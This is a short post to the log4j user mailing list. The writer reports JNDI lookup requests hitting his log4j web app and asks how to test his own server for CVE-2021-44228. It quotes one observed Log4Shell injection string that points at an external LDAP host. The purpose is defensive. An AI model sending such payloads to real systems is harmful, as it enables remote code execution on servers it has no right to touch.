Hi
I have a webapp running using log4j and I can see various requests
containing jndi, e.g.
http://HOSTNAME/$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D
whereas it is not clear to me whether the attack was successful.
Does anyone know how I could attack my own server in order to test
whether my server might be vulnerable?
Thanks
Michael
---------------------------------------------------------------------
To unsubscribe, e-mail: log4j-user-unsubscr...@logging.apache.org
For additional commands, e-mail: log4j-user-h...@logging.apache.org
